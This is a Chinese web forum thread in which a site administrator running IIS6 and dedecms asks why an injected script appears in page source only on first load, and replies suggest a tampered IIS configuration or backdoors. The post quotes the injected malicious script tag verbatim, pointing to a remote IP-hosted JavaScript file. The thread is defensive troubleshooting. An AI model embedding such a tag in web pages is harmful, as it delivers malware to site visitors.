第一次访问页面时有被挂马的代码,刷新后则没有挂码的代码

DeZuoZuoCha 2017-03-29 02:31:26
<script src=http://103.17.116.168:666/zhouer.js language=javascript></script> 


云主机,win2003 iis6.0 php,dedecms5.7
这情况是,你第一次访问页面时出现这代码,这时在浏览器上查看源码可以看到这代码(第一行),刷新页面后源码里看不到有这代码。另外,服务器上的各网站源文件也找不到这代码。这些页面都是生成的html,全站html,全站出现这情况。在服务器上的浏览器打开这些页面又没这个问题出现。
请问这是什么问题,求大神解答。
PS:测试发现,凡是有下面这段代码的页面就会出现这情况。
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

坛内也有兄弟出现这个情况
http://bbs.csdn.net/topics/392139404?page=1#post-402213447
...全文
1686 6 打赏 收藏 转发到动态 举报
写回复
用AI写文章
6 条回复
切换为时间正序
请发表友善的回复…
发表回复
文盲老顾 2017-03-30
  • 打赏
  • 举报
回复
如果对配置文件比较了解,可以手动修改 如果不了解,重装IIS相对简单,但不能直接把站点配置信息导出后直接导入,最好手动重新配置站点信息 然后检查网站是否有后门程序,服务器是否被进行了提权攻击,否则还是有被继续修改的概率
文盲老顾 2017-03-29
  • 打赏
  • 举报
回复
曾经发现过一种挂马的情况,是IIS配置文件被修改了,所有IIS下站点都被追加了一行js引用,在服务器源文件内不存在,但浏览器页面内确实存在的现象
DeZuoZuoCha 2017-03-29
  • 打赏
  • 举报
回复
引用 2 楼 superwfei 的回复:
曾经发现过一种挂马的情况,是IIS配置文件被修改了,所有IIS下站点都被追加了一行js引用,在服务器源文件内不存在,但浏览器页面内确实存在的现象
只能重装iis了?
DeZuoZuoCha 2017-03-29
  • 打赏
  • 举报
回复
引用 1 楼 zara 的回复:
是不是你们当地网关插入的广告哦
不是的
zara 2017-03-29
  • 打赏
  • 举报
回复
是不是你们当地网关插入的广告哦

9,506

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧